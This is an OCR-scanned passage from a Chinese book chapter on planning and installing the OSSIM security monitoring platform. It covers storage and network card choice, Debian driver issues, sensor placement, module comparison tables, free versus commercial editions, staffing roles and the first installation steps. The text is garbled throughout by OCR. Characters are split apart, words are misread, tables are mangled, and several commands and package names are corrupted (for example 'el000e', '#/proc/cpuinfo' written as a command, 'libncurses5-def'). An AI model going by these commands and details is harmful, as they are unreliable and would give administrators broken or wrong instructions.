但 对 于 OSSIM 系统 而 言 依然 缓慢 , 所 以 对 于 有 条 件 的 企业 建议 采用 固态 硬盘 ， 当 前 SSD 能 轻 
松 达 到 50000。 


Er 固态 硬盘 可 分 为 PCIe 和 SAS (SATA) 接口 。PCIe 有 着 最 好 的 性 能 , 但 价格 较 贵 。 而 SAS 


接口 的 一 个 好 处 是 易于 安装 ， 升 级 当前 服务 器 的 存储 到 SAS 接口 的 固态 硬盘 仅 需 拆 印 原 
| 来 的 机 械 硬盘 即 可 。 而 PCIe 需要 拆 开 服务 器 的 背 板 ,工程 量 较 大 ， 普 通 系统 工程 师 恐 难 
胜任 。 


C5) 对 于 Broadcom Netxtreme 网 卡 所 遇 到 的 问题 
市 面 上 有 一 些 HP 和 Dell 的 服务 器 采用 集成 Broadcom Netxtreme 网 卡 ， 安 装 OSSIM 系统 
就 会 遇 到 找 不 到 网 卡 驱动 的 问题 ， 因 为 Debian 系统 无 法 加 载 firemware bnx2 模块 ， 这 时 ， 需 
要 到 Broadcom 官网 下 载 For Debian 的 驱动 ， 然 后 通过 U 盘 安 装 。 
成 功 加 载 驱 动 后 ， 在 系统 内 就 能 查看 到 详细 信息 : 
# dmesg | grep bnx2 
[ 1.909228] Broadcom NetXtreme II Gigabit Ethernet Driver bnx2 v1.7.5 


[ 2.634060] firmware: requesting bnx2-06-4.0.5.fw 
[ 3.185810] firmware: requesting bnx2-06-4.0.5.fw 


新 版 本 的 OSSIM 在 这 方面 进行 了 改进 , 虽 增 加 了 firmware-bnx2 包 , 但 没 能 够 对 Broadcom 
Netxtreme 系列 网 卡 有 所 改善 ， 普 通用 户 推 荐 Intel Pro 100/1000 系列 服务 器 网 卡 〈 对 应 芯片 型 
号 82558/82559)。 还 有 更 多 Debian 支持 的 PCI 设备 可 到 http://wiki.debian.org/DeviceDatabase/ 
PCI 中 查询 。 

对 于 OSSIM 服务 器 的 数据 存储 问题 , 可 使 用 已 有 的 存储 系统 。 网 卡 方面 选用 Intel WRF 
兆 网 卡 比较 合适 ， 另 外 在 交换 设备 上 做 好 SPAN 设置 这 一 步 至 关 重 要 ， 详 细 操 作 后 面 会 讲 到 。 
需要 将 流量 镜像 到 Sensor 的 网 络 接口 。 


2.3.2 ”传感器 部 署 
单机 模式 下 OSSIM 系统 放置 在 什么 位 置 比较 合适 ? 有 两 种 方案 : 


e 部署 在 公司 互联 网 的 出 口 (主要 抓 取 和 分 析 上 网 流量 ) 。 
@ 部署 在 DMZ 对 此 区 域 的 服务 器 监控 ， 如 图 2-2 所 示 。 
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图 2-2 单 台 OSSIM 系统 安装 部 署 


单 台 OSSIM 系统 安装 非常 方便 ， 按 提示 操作 即 可 。 
采用 分 布 式 监控 ， 部 署 在 重点 VLAN， 有 选择 地 监控 机 器 设备 ， 如 图 2-3 所 示 。 


Lj T Lj | 
I x = l 
A ut 


图 2-3 分 布 式 流量 监控 部 署 示 意 


分 布 式 系统 架构 C/S 模式 , 整体 来 讲 由 代理 和 服务 器 所 组 成 , 图 2-3 中 的 OSSIM sensor-1、 
sensor-2、sensor-3 这 3 台 机 器 为 代理 ，OSSIM Server 为 服务 器 ， 这 里 的 代理 机 器 上 包括 所 选 
择 的 监控 插件 ， 以 及 探测 器 〈sensor)， 主 要 通过 插件 来 捕获 当前 VLAN 中 需要 监控 的 数据 ， 
经 过 代理 机 器 上 的 Sensor 分 析 形 成 OSSIM Sever 服务 器 能 够 读 取 的 日 志 ， 发 送 给 Server 进行 
关联 处 理 后 ， 统 一 存放 到 事件 数据 库 中 ， 这 样 做 的 目的 是 为 OSSIM 的 审计 模块 提供 关联 分 析 
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和 风险 评估 的 数据 。 


2.3.3 ”分 布 式 OSSIM 系统 探 针 布 局 
大 型 网 络 环境 中 OSSIM 通常 采用 5 个 探 针 来 进行 检测 。 探 针 1、2 所 在 的 网 段 的 数据 流 
量 是 最 大 的 ， 为 有 效 防止 误 报 〈 对 无 害 的 网 络 行为 发 出 的 告警 ) 和 漏 报 ， 设 置 了 两 个 探 针 。 


RH 1 位 于 防火 墙 外 ， 可 以 查看 所 有 来 自 Internet 的 攻击 。 为 了 减少 受 攻 击 风险 ， 探 
针 1 使 用 无 IP 地 址 的 网 卡 进行 监听 ， 以 保证 网 络 入 侵 检测 系统 自身 的 安全 ， 通 过 另 
一 块 网 卡 接 入 内 网 并 为 其 分 配 内 网 所 使 用 的 私有 地 址 ， 以 便 从 内 网 访问 分 析 控 制 台 
程序 ACID。 

探 针 2 位 于 防火 墙 内 部 ， 使 用 交换 机 (SPAN 口 ) ， 任 何其 他 端口 的 进出 数据 都 可 从 
此 得 到 ， 不 过 采用 此 端口 可 能 降低 交换 机 的 性 能 。 该 探 针 可 以 看 到 外 部 所 有 突破 防 
火 墙 对 内 网 的 攻击 ， 发 现 防火 墙 的 设置 失误 和 漏洞 所 在 ， 还 可 以 发 现 一 些 由 内 网 发 
起 向 外 网 服务 器 的 攻击 。 

探 针 3 位 于 服务 器 组 内 ， 用 于 检测 所 有 对 各 服务 器 的 攻击 。 

探 针 4 位 于 工作 站 组 内 ， 用 于 检测 所 有 对 各 工作 站 的 攻击 。 

探 针 5 位 于 内 部 办 公 网 ， 用 于 检测 所 有 对 内 部 办 公 网 的 攻击 。 


这 5 个 探 针 整 体 布局 如 图 2-4 所 示 。 


2-4 OSSIM 探 针 位 置 


分 布 式 网 络 中 各 探 针 分 布 在 各 个 VLAN， 这 时 必须 保证 时 间 精 准 ， 这 主要 通过 NTP w 
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2.3.4 OSSIM 服务 器 的 选择 

部 署 OSSIM 服务 器 时 常会 遇 到 两 类 问题 , 一 类 是 无 法 识别 硬盘 , 另 一 类 是 无 法 识别 网 卡 。 
对 于 Dell, HP 和 IBM 品牌 X86 服务 器 系列 , 官方 默认 对 Windows 以 及 Linux 发 行 版 Rad Hat、 
SUSE Linux 提供 RPM 格式 的 驱动 支持 ， 它 们 只 提供 Red Hat 和 SUSE 的 硬件 兼容 列表 ， 对 于 
Debian Linux 平台 支持 相对 较 差 。 

- 些 使 用 OSSIM 的 用 户 , 为 服务 器 Raid 卡 安装 驱动 头痛 不 已 。 经 测试 HP ProLiant DL160 

G6 . DL360. DL380 (G8). IBM X3100M4 以 及 方正 圆 明 LT200 2600 等 服务 器 都 能 顺利 安装 
OSSIM 4。 大 家 在 选择 一 款 专业 服务 器 时 ， 需 要 确认 它 是 否 支 持 Debian Linux 系统 。 

OSSIM 是 基于 Debian Linux 的 系统 , 所 以 并 没有 包含 最 新 服务 器 的 网 卡 驱动 和 Raid 卡 驱 
动 , 在 厂家 那里 没有 提供 兼容 列表 时 , 大 家 可 以 在 http://kmuto.jp/debian/hel 上 查询 机 器 是 否 适 
合 安 装 。 例 如 查询 IBM X3650 机 器 是 否 能 安装 就 可 以 查询 
http:/kmuto.jp/debian/hcVIBM/x3650/。 

在 网 卡 的 选择 方面 大 家 需要 注意 ， 有 条 件 的 部 门 可 以 选择 带 队 列 功能 的 网 卡 ， 例 如 Intel 
82576 千 兆 网 卡 ， 它 支持 PCIe 2.0 X4， 支 持 MSI-x 中 断 ， 支 持 8 个 RSS 队列 。 

对 于 CPU 的 选择 ， 尽 量 选择 多 路 至 强 处 理 器 ， 因 为 在 OSSIM 框架 内 的 绝 大 多 数 服 务 都 
支持 多 线程 ， 如 表 2-1 所 示 。 


表 2-1 OSSIM 中 的 多 线程 与 单线 程 服务 


MySQL, RabbitMQ, Suricata, Nmap, Memcached, ossim-framework, ossim-server, Ntop. 
支持 多 线程 服务 MAN T P » 


Nagios, Apache, OpenVas 


支持 单线 程 服务 


在 多 核 运算 上 ， 不 是 CPU 越 多 越 好 ， 比 如 我 们 选择 一 款 Xeon E5-2680 CPU, 8 核心 16 
线程 20MB 三 级 缓存 强大 处 理 器 。 如 果 在 增加 CPU 对 提升 系统 性 能 并 不 明显 时 ， 我 们 也 需要 
知道 如 何 查看 CPU 指标 ， 这 个 指标 主要 是 通过 在 系统 中 查看 /proc/cpuinfo 文件 获取 ， 我 们 会 
发 现 以 下 信息 : 


€ CPU 的 物理 个 数 。 
具有 几 个 逻辑 核 。 

CPU 是 否 启用 超 线程 。 
CPU 的 主 频 。 

逻辑 CPU. CPU 型 号 。 


对 于 选 型 安装 我 们 再 看 个 例子 ，IBM X3650 7979 服务 器 安装 OSSIM， 由 于 Debian 对 
Broadcom NetXtremeII 网 卡 不 支持 (笔者 在 Dell PowerEdge R720 服务 器 上 部 署 时 同样 遇 到 过 
这 样 的 问题 )， 所 以 如 果 在 X3650 服务 器 上 安装 OSSIM 系统 会 出 现 找 不 到 网 卡 的 情况 。 我 们 
首先 到 Debian 官网 下 载 驱动 ,然后 复制 到 U 盘 , 再 通过 U 盘 加 载 到 X3650 服务 器 上 并 安装 ， 
最 后 重启 系统 。 
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下 载 地 址 : http://packages.debian.org/sid/all/firmware-bnx2/download。 安 装 如 下 : 
#dpkg -i firmware-bnx2 0.40 all.deb 


在 系统 引导 时 可 以 看 到 类 似 “load firmware file bnx2-06-4.0.5.fw” 的 信息 , 表示 加 载 成 功 。 
然后 我 们 就 可 以 通过 ossim-setup 开始 为 服务 器 配置 IP。 
Linux 系统 中 把 常用 应 急 驱动 都 封装 到 initrd.img (或 initrd.gz) 内 核 中 ， 通 常 来 讲 Linux 
版 本 越 高 内 核 体积 越 大 ， 相 应 支持 的 硬件 驱动 也 就 越 多 ， 表 2-2 中 总 结 了 常见 Linux 发 行 版 的 
内 核 容量 。 
表 2-2 主要 服务 器 Linux 版 本 内 核对 比 
主要 发 行 版 initrd.img 容量 


Redhat 企业 版 


Suse 企业 版 


Debian 


如 果 Raid 卡 或 网 卡 无 法 加 载 驱动 这 时 就 需 编译 成 可 加 载 模块 来 安装 有 时 在 安装 OSSIM 
过 程 中 总 会 找 不 到 一 些 硬件 这 里 提供 一 个 方法 , 使 用 Grml64 光盘 , 它 是 基于 Debian 的 系统 ， 
它 里 面包 含 了 许多 工具 ， 可 以 直接 用 光盘 启动 。Grml 提供 更 多 自动 硬件 识别 ， 它 主要 能 帮助 
识别 服务 器 的 硬件 设备 的 具体 型 号 〈 可 以 自行 下 载 相应 的 驱动 ， 无 须 开 机 箱 盖 查 看 硬件 )。 下 
载 地 址 为 http://grml.org/download/， 其 完整 版 容量 为 350MB。 


2.8.5 网 卡 的 选择 
通常 , 大 家 在 实体 服务 器 上 通过 光盘 安装 OSSIM 过 程 中 , 没有 提示 输入 IP、 网 关 等 配置 ， 
进入 系统 后 才 发 现 网 卡 没有 加 载 驱动 , 此 时 你 再 返回 去 下 载 服务 器 网 卡 驱动 比较 麻烦 , 那 到 底 
OSSIM 系统 需要 什么 样 的 网 卡 呢 ? 如 果 OSSIM 工作 在 千 兆 网 络 环境 , 建议 加 装 一 块 性 能 优异 
的 网 卡 , 首 推 ntel Pro 网 卡 , 它 是 著名 品牌 且 性 能 稳定 , 可 显著 地 改善 服务 器 网 络 性 能 的 特性 ， 
解决 网 络 传输 瓶颈 。 
哪 种 网 卡 最 适合 OSSIM 呢 ? 从 安装 方便 程度 和 价格 上 看 当 属 Intel Pro 10/100/1000 网 卡 ， 
但 它 的 吞吐 量 并 不 是 最 好 ，OSSIM 自 带 Intel Pro 网 卡 驱 动 ， 另 外 选择 Realtek 瑞明 8169 芯片 
COSSIM 直接 带 驱动 ) 网卡 也 是 一 种 选择 ， 它 比 Intel 略 逊 一 筹 ， 比 它 更 好 的 例如 
Intel Gigabit ET Quad Port Server Adapter， 型 号 是 E1G44ET， 这 需要 你 手动 安装 驱动 ， 这 块 基 
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于 两 个 82576 芯片 的 强大 四 口 千 兆 网 卡 ， 适 合 大 流量 网 络 环境 下 监控 ， 但 价格 比较 贵 。 


2.3.6 ”手动 加 载 网 卡 驱动 

Intel 网 卡 下 载 地 址 : https://downloadcenter.intel.com/zh-cn， 进 入 网 页 后 在 查找 类 别 中 选择 
“以 太 网 控制 器 ”， 然 后 选择 对 应 芯片 型 号 ， 例 如 82574 千 兆 以 太 网 控制 器 。 在 弹出 页 面 中 选 
择 操 作 系统 为 Linux， 在 下 载 驱 动 源码 包 中 需要 注意 内 核 版 本 号 ，OSSIM 的 Linux 内 核 版 本 为 
2.6.32， 所 以 需 选 择 2.6 内 核 的 网 卡 驱 动 。 手 动 编译 源码 驱动 步骤 如 下 : 


(1) 检查 GCC 编译 环境 ， 若 没有 则 需要 安装 。 
(2) 安装 Kernel 2.6.32 源码 包 ， 将 内 核 文 件 linux-2.6.32.tarbz2 解压 到 /usr/src 目录 下 。 
(3) 安装 所 需 软件 包 : 


#apt-get install kernel-package libncurses5-def fakeroot 


C) 驱动 程序 编译 及 安装 ， 例 如 从 官网 获取 Intele1000e 的 网 卡 驱动 程序 源码 包 为 
e100e-3.0.tar.gz， 将 驱动 解压 后 复制 到 /usr/sre 目录 。 在 src 目录 下 依次 执行 make (编译 驱动 程 
序 源码 )、make install〈 安 装 相 应 的 驱动 程序 )， 安 装 完毕 以 后 将 驱动 程序 生成 的 *.o 复制 到 
/lib/modules/ 内 核 版 本 /kernel/drives/net 目录 下 ， 然 后 执行 depmod -a 加 载 驱动 程序 。 

(5) 驱动 程序 测试 : 

#modprobe el000e ANN modprobe 命令 加 载 网 卡 模块 


使 用 lshw -c network 列 出 有 关 网 卡 的 详细 信息 ， 得 到 的 信息 中 包括 版 本 +NAPI 信息 表示 


2.3.7 采用 多 核 还 是 单 核 CPU 

在 OSSIM 中 集成 了 很 多 优秀 的 抓 包 工具 ， 例 如 tcpdump、snort/suricata。 这 些 工 具 都 有 具有 
数据 包 捕 获 函 数 库 ， 例 如 PF_Ring， 它 们 都 是 以 库 函 数 为 基础 的 软件 方式 抓 包 ， 在 老 版 本 中 采 
用 Libpcap 抓 包 ， 由 于 它 接收 数据 包 时 产生 的 中 断 开销 ， 以 及 将 接收 到 的 数据 包 从 网 卡 复制 到 
内 核 ， 再 从 内 核 复制 到 用 户 空间 消耗 大 量 CPU 资源 ， 所 以 不 适用 高 速 链 路 。 若 提高 抓 包 效率 
就 必须 减少 内 存 复制 次 数 ， 改 变 中 断 方式 ， 减 少 不 必 要 的 CPU 中 断 ，PF_Ring 机 制 在 这 种 需 
求 下 诞生 。 在 OSSIM 中 采用 了 PF. Ring*NAPI 的 捕 包 机 制 。 

对 于 一 个 流量 监控 模块 来 说 ， 必 须要 求 足够 的 CPU 资源 ， 来 对 捕获 的 数据 包 做 深 一 层 处 
理 和 分 析 ， 否则 捕获 的 数据 包 会 被 丢弃 。 因 此 有 必要 测试 在 各 种 数据 包 大 小 下 , 包 捕获 有 没有 
REEF, 注意 观察 CPU FHK. 

即使 使 用 了 Suricata 支持 多 线程 ， 在 多 核 平 台 上 抓 包 ， 也 没有 成 倍 提升 性 能 ， 可 以 说 采用 
多 核 和 Suricata 后 抓 包 效率 比 过 去 提升 了 不 少 ， 但 还 有 一 部 分 不 可 避免 的 CPU 消耗 主要 集中 
在 内 核 空间 。 
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2.3.8 ”查找 硬件 信息 
有 关 硬 件 的 信息 包括 PCI 总 线 设 备 、USB 设备 、SCSI 设备 等 相应 的 设备 信息 至 关 重 要 ， 
下 面 这 几 条 命令 需要 掌握 : 
Ispci 命令 会 列 出 系统 中 的 PCI 总 线 设备 ， 使 用 参数 -v、-vvv 可 以 得 到 更 多 详细 信息 。 
#1shw \\ 硬 件 配置 信息 检测 工具 


USB 设备 的 信息 可 以 用 lsusb 命令 获得 。 如 果 希 望 查 看 硬盘 剩余 空间 就 要 借助 于 df 命令 。 
#df -h 


查看 CPU 型 号 及 内 核 数 。 
#/proc/cpuinfo 


2.3.9 OSSIM USM 和 Sensor 安装 模式 的 区 别 

初学 者 在 安装 OSSIM 时 ， 首 要 问题 就 是 选择 USM 安装 还 是 Sensor 安装 ， 之 所 以 产生 这 
样 的 疑问 是 因为 对 于 这 两 种 安装 模式 中 的 组 成 不 了 解 。OSSIM USM 包括 Sensor 的 所 有 模块 ， 
为 什么 要 单独 分 出 来 Sensor 安装 方式 ?这 是 为 了 分 布 式 部 署 OSSIM 时 用 , 如 果 用 户 选择 在 单 
台 服 务 器 上 混合 部 署 ， 那 么 就 选择 USM， 如 果 你 希望 在 多 个 VLAN 分 别 部 署 ， 则 除了 安装 
USM 之 外 还 需要 在 各 个 嗅 探 点 安装 Sensor， 将 Sensor 和 Server 连接 。 

USM 和 Sensor 主要 区 别 就 在 所 安装 模块 上 。 下 面 参考 OSSIM USM 4.8, 更 新 版 本 中 的 主 
要 模块 类 似 表 2-3， 系 统 对 应 服务 组 件 区 别 也 如 表 2-3 所 示 。 


表 2-3 Alienvault OSSIM USM & Sensor 主要 模块 对 比 


组 件 /服务 分 类 模块 OSSIM USM Sensor 
Alienvault-agent-generator, alienvault-api-core, 
alienvault-api-script, alienvault-api-center, 
alienvault-doctor, alienvault-dummy-sensor, 
alienvault-logrotate, alienvault-monit, alienvault-openvas. 
alienvault-openvas-plugins, alienvault-plugins, 


Alienvault alienvault-rsyslog 


Alienvault-apache2, alienvault-api, alienvault-crosscor., 
alienvault-directiv, alienvault-dummy-da, 
alienvault-dummy-fr, alienvault-dummy-se (server) 、 
alienvault-framewor. alienvault-idm, alienvault-memcache, 


alienvault-mysql. alienvault-php5. alienvault-postfix 


Apache2, apache2-doc, apache2-mpm-prefork , 


Apache 
Lii apache2-utils, apache2-bin, apache2-common 
Fprobe fprobe-nj 
Netflow z fpr = 
Nfdump、nfsen 4 x 
Memcachd memcached 4 x 
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( 续 表 ) 
组 件 / 服 务 分 类 模块 OSSIMUSM Sensor 
Mrtg mrtg 4 4 
Munin Munin, munin-common, munin-node 4 4 
Monit Alienvault-monit, monit 4 4 
Nagios Nagios-images, nagios-pluginss nágios-plugins-basi, J x 
nagios-plugins-stan, nagios3. nagios3-common, nagios3-core 
Ncurses ncurses-base, ncurses-bin, libncurses5,. libncurseswS 4 J 
Ocsinventory Ocsinventory-agent, ocsinventory-server 4 x 
Ntop Alienvault-ntop. ntop. pfring 4 4 
OpenSSH Openssh-blacklist, openssh-client, openssh-server 4 4 
OpenSSL Openssl-blacklist, openssl 4 4 
OpenVPN Openvpn. openvpn-blacklist 4 4 
Ossec Ossec-hids 4 4 
OpenVAS Openvas-administra , openvas-manager, openvas-scanner, J F 
openvas-cli 
MySQL Percona-server-clie, percona-server-comm, J x 
percona-server-serv, mytop 
Nagios Nagios3-common, Nagios3-core, Nagios-plugins 4 x 
Postfix Postfix 4 x 
Rsyslog rsyslog 4 4 
Samba Samba-common, smbclient 4 4 
Snort, snort-common, snort-common-librar, 
Snort 4 4 
snort-rules-default 
Suricata Suricata, suricata-rules-default 4 4 
Squid Squid, squid-common, squid-langpack, squid3., J x 
squid3-common 
Snmp Snmp, snmpd 4 4 
Prads Alienvault-prads, prads J 4 
OSSIM-agent, ossim-cd-configs. osism-cd-tools, 
ossim-contrib, ossim-database-migration, ossim-downloads. 4 4 
OSSIM Ossim-geoip. ossim-menu-setup. ossim-repo-key. ossim-utils 
OSSIM-compliance, ossim-framework , 
ossim-gramework-dae, ossim-mysql, ossim-mysgl-ext, 4 x 
Ossim-server, ossim-taxonomy 
OCS IneventServer ocsinventory-server agent 4 X 
Redis Redis Server 4 x 
HA Cluster-agents, cluster-glue,. heartbeat 4 4 
Capturing Packet Wireshark-common, tshark, dsniff, tcpdump, libpcap, J 4 
pfring、tcpreplay 
Rabbitmq Rabbitmq-server 4 x 
Rsyslog Alienvault-rsyslog. rsyslog 4 y 
Erlang Erlang〈 用 于 分 布 式 系统 中 结构 化 的 编程 语言 4 x 
" gcc-4.4-base, libgccl 4 v 
C 编译 环境 gcc-4.4 4 x 
Perl Perl, perl-base, perl-modules ~ 4 


85 


开源 安全 运 维 平台 一 一 OSSIM 最 佳 实践 


组 件 / 服 务 分 类 模 块 


Php5 、phpgd 、php5-adodb 、php5-cgi 、php5-common 、 


( 续 表 ) 
OSSIM USM 


php5-mysql、php5-odbc、php5-snmp M * 
| Php-db. Php-soap. php-xajax. php5-memcache 4 x 
Python 4 MM 
Tcl Tcl8.5、tcl8.5-dev 4 4 
| nikto 4 x 

Scan Tool 
unn nmap 4 4 
Iptables iptables 4 4 
p 随机 密码 生成 | Pwgen d | 4 


2.3.10 OSSIM 商业 版 和 免费 版 比较 


OSSIM 免费 版 中 一 些 功能 受到 限制 , 例如 Logger、Sing、Forward Alarms、Forward Events 
四 项 服务 禁用 。 服 务 器 组 件 查询 位 置 : Configuration 一 Deployment 一 Components 一 Servers， 只 
输出 基本 报表 。 在 表 2-4 中 总 结 了 免费 OSSIM 和 商业 版 OSSIM USM 的 主要 区 别 。 


R24 商业 版 和 免费 版 的 区 别 


OSSIM USM All-in-One USM Standard&Enterpprise 
适应 人 群 安全 研究 人 员 大 型 企业 和 组 织 
价格 Open Source 3600$ - 
网 络 流量 、 协 议 分 析 
网 络 资产 管理 、 漏 洞 扫 描 
应 用 案例 安全 事件 管理 比 开源 版 增加 了 合 规 管理 和 报告 PCI、HIPAA、 
可 用 性 管理 、 完 整 性 检查 ISO 27002 (SOX) ) 、 事 件 响应 、 日 志 管理 
报告 输出 (Alarm、Asset、 
PCI-DSS 等 ) 
技术 支持 社区 厂商 支持 
规则 /插件 数量 少量 规则 丰富 可 持续 更 新 
管理 集中 管理 和 配置 集中 管理 和 配置 
威胁 情报 社区 的 开发 组 织 Alienvault 实验 室 威胁 智能 订阅 (每 周 更 新 ) 
报告 社区 提供 的 基本 功能 提供 数 千 种 威胁 报告 方便 导出 多 种 格式 
访问 控制 基于 角色 的 访问 控制 权限 基于 角色 的 访问 控制 权限 以 及 丰富 的 模板 
不 易 扩展 性 ， 能 受 MySQL | 可 在 线 提供 扩展 支持 , 包括 单机 部 署 和 多 机 分 布 部 
ida 限制 署 ， 便 于 扩展 服务 器 和 MySQL 
Alienvault Logger E 有 
转发 Alam 和 Event | 不 能 能 
智能 事件 分 析 x 有 
SIEM 数据 备份 数量 | 少 多 
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d OSSIM USM ALL-IN-ONE 包含 Sensor. Framework, Server. Database. | 
2.3.11 OSSIM 实施 特点 

OSSIM 系统 的 实施 过 程 中 ， 各 个 单位 需要 结合 自身 的 实际 情况 进行 ， 以 下 是 作者 总 结 的 
几 个 关键 因素 。 

CD 对 企业 内 的 业务 系统 进行 调研 ， 主 要 目的 是 识别 信息 系统 的 业务 种 类 和 特性 ， 了 解 具 体 
信息 系统 处 理 的 有 多 少 种 业务 应 用 ， 这些 业务 应 用 各 自 的 业务 内 容 、 业 务 流程 、 业 务 用 户 和 管 
理 用 户 等 ， 从 中 明确 网 络 系统 的 业务 特性 ， 这 样 有 助 于 根据 业务 特征 和 安全 需求 ， 制 定安 全 策 
略 ， 实 际 上 也 是 帮助 安全 人 员 了 解 业 务 系统 的 网 络 架构 ， 此 过 程 中 要 能 调查 资产 情况 。 


(2) 选择 的 OSSIM 版 本 要 具有 良好 的 网 络 环境 适应 性 ， 不 能 因为 新 上 系统 而 大 幅 调 整 
网 络 结构 ， 所 以 采用 旁 路 接 入 方式 进行 嗅 探 是 比较 好 的 方式 。 

G) 支持 快速 部 署 ， 具 有 良好 的 用 户 体验 ，OSSIM 最 大 亮点 是 能 够 让 各 类 用 户 接受 ， 能 
够 快速 部 署 ， 并 且 在 部 署 时 具有 友好 的 Web 引导 界面 。 

(D 具有 较 好 的 可 扩展 性 ， 能 够 提供 不 断 更 新 的 安全 检查 引擎 和 规则 库 升 级 。 

(5) 总 体 规划 、 分 步 实施 。 


“总 体 规 划 、 分 步 实施 ”是 OSSIM 系统 实施 的 重要 策略 。 在 总 体 规划 的 同时 ， 将 系统 的 
建设 目标 分 解 为 若干 可 操控 的 项 目 ， 分 步 实施 ， 例 如 安装 OSSIM USM 之 后 ， 首 先 升级 系统 ， 
然后 备份 初始 配置 然后 开始 逐一 安装 Senso 调试 一 个 加 入 一 个 切忌 同时 加 入 了 多 个 Sensor 
后 ， 再 统一 联 调 ， 此 时 出 现 了 错误 就 不 便于 排查 。 


C60 协调 好 技术 与 管理 的 问题 。OSSIM 实施 涉及 技术 、 人 员 和 流程 , 其 中 人 是 最 重要 的 、 
最 不 容易 搞定 的 因素 。 为 了 获得 最 终 的 分 析 效 果 ， 需 要 收集 各 种 门类 的 信息 , 但 不 幸 的 是 ， 这 
些 信 息 往往 隶属 于 不 同 的 部 门 , 例如 网 络 和 主机 ,还 有 应 用 可 能 分 属于 儿 个 部 门 。 如 何 统 一 收 
集 和 分 析 这 些 信息 ， 同 时 确保 不 会 引发 大 家 的 担忧 是 必须 考虑 的 问题 。 

CD OSSIM 规划 设计 需要 有 前 瞻 性 ， 而 且 在 公司 拥有 OSSIM 系统 之 前 ， 必 须 配 置 一 个 
安全 团队 ， 公 司 在 组 建安 全 团队 时 ， 至 少 需要 1 名 安全 行业 多 年 经 验 的 专家 作为 技术 带头 人 ， 
能 够 将 他 们 的 经 验 转换 为 知识 。 这 个 SIEM 专家 需要 很 高 的 素质 , 需要 善于 调配 每 种 服务 器 上 
收集 到 的 数据 ， 需 要 考虑 数据 如 何 存放 ， 以 及 SIEM 系统 如 何 分 类 等 等 。 如 果 企 业 没有 SIEM 
专家 和 安全 团队 ， 贸 然 上 OSSIM 系统 则 很 难 成 功 。 

(8) OSSIM 上 线 要 素 。 为 了 实现 OSSIM 管理 ， 把 系统 上 线 远 远 不 够 ，OSSIM 建设 管理 
是 一 个 慢 工 细 活 , 需要 长 期 积累 和 沉淀 。 有 了 这 套 东 西 , 在 新 一 代 攻击 手段 面前 依然 十 分 脆弱 ， 
仍然 会 有 新 的 问题 产生 .如 何 才能 将 网 络 安全 防线 真正 从 网 络 边缘 扩展 落实 到 所 有 网 络 终端 节 
AERE? 从 广大 承建 方 及 使 用 方 看 来 ,后 续 跟 进 的 合理 化 使 用 管理 能 帮助 用 户 实现 这 一 点 。 当 
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系统 上 线 以 后 ， 要 做 到 全 网 无 盲点 的 OSSIM 管理 ， 都 不 是 一 步 到 位 的 ， 需 要 将 管理 制度 和 流 
程 通过 循序 渐进 的 过 程 逐步 建立 起 来 ， 并 进行 不 断 地 完善 优化 。OSSIM 的 部 署 几乎 跨越 整个 
机 房 设备 ， 从 网 络 基础 设施 到 网 络 管理 ,所 以 OSSIM 的 涉及 面 非常 广泛 , 包括 系统 、 数 据 库 、 
中 间 件 、 存 储 、 网 络 基 础 设施 等 诸多 环节 。 


2.3.12 OSSIM 管理 员 分 工 

建设 一 套 合格 的 OSSIM 系统 ， 不 仅 是 从 技术 角度 去 完善 技术 产品 ， 一 方面 还 需要 一 个 完 
整 的 系统 运行 管理 流程 ， 建 立 一 个 有 技术 能 力 、 效 率 高 的 管理 团队 。 该 管理 团队 由 单位 领导 牵 
头 ， 以 信息 安全 管理 部 门人 员 为 主体 ,配合 与 系统 架构 师 、 系 统管 理 员 、 网 络 管理 员 、 数 据 库 
管理 员 相关 人 员 组 成 , 系统 运行 的 管理 、 操 作 、 审 计 等 权限 明确 , 做 到 三 权 分 立 。 下面 就 OSSIM 
系统 建设 后 管理 人 员 分 工 建议 如 下 : 

(1) 安全 事件 分 析 人 员 

通过 筛选 和 分 析 STEM 收集 的 安全 事件 , 发 现 安全 攻击 与 威胁 , 负责 监视 安全 事件 告警 的 
TopN、 安 全 事件 的 分 类 、 报 告 安全 事件 最 多 的 主机 Top 10、 每 天 /每 周 安全 事件 变化 趋势 、 病 
毒 报告 Top 10、 详 细 的 安全 事件 告警 (根据 收 到 的 告警 再 修改 关联 指令 策略 )、SIEM 事件 控 
WA. 管理 资产 的 变化 , 漏洞 扫描 报告 ,追踪 漏洞 修复 情况 、 网 络 服 务 可 用 性 、 流 量 监控 和 协 
议 分 析 、 定 期 收集 系统 各 项 报告 , 通过 各 种 报表 和 数据 分 析出 网 络 中 存在 的 病毒 感染 、 外 部 入 
侵 、 信 息 泄露 、 员 工 违规 等 异常 事件 。 

(2) OSSIM 系统 架构 人 员 

基于 业务 重要 性 和 需求 的 变化 ， 不 断 地 优化 安全 事件 和 流程 ， 并 负责 企业 日 志 容量 估算 ， 
系统 架构 规划 、 安 装 、 系 统 调 优 、 配 置 备份 、 数 据 库 优化 。 

(3) 安全 审计 人 员 

安全 审计 人 员 需 要 具有 一 定 的 ISO27001、PCLDSS 以 及 等 级 保护 的 知识 ， 主 要 负责 评估 
整个 系统 的 运行 情况 , 判断 管理 工作 的 合理 性 、 合 规 性 , 做 到 使 系统 运行 更 符合 实现 具体 目标 。 


混合 服务 器 /传感器 安装 模式 


OSSIM 的 安装 工具 遵循 经 典 的 GNU/Linux 安装 流程 ， 同 时 提供 了 人 性 化 的 向 导 ， 智 能 化 检 
测 和 配置 功能 。 下 面 我 们 动手 实践 一 下 吧 ， 首 先 我 们 选用 OSSM 的 ISO 镜像 〈 或 光盘 ) 安装 。 


2.4.1 安装 前 的 准备 工作 
@ 需要 收集 系统 信息 ， 对 硬盘 进行 检查 、 分 区 及 规划 。 
日” 选择 安装 介质 。 


大 家 可 以 到 http://www.alienvault.comyfree-downloads-services F$ OSSIM 安装 包 ， 目 前 官 
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网 提供 64 位 镜像 的 安装 文件 。 


2.4.2 ”开始 安装 OSSIM 
对 于 初学 者 而 言 可 以 采用 混合 服务 器 /传感器 模式 安装 , 这 种 安装 模式 是 将 所 有 OSSIM 组 
件 都 安装 到 同一 台 计 算 机 上 。 接 下 来 我 们 开始 具体 操作 ， 由 镜像 文件 (这 里 以 alienvault-ossim 


4.8 ISO 为 例 ) 


启动 系统 ， 安 装 界 面 如 图 2-5 所 示 ， 选 择 Install AlienVault USM 4.8 (64 Bit) XE 
选项 将 包含 所 有 OSSIM 的 4 个 模块 (包括 Sensor-OSSIM 


Server+Database+Framework)， 接 着 启动 系统 。 


启动 菜单 


[e| Vv] 


ALIEN VAULT OSSIM 
lienUault USM 4.8 (64 Bit) 
nault Sensor 4.8 (64 B 


Install A 

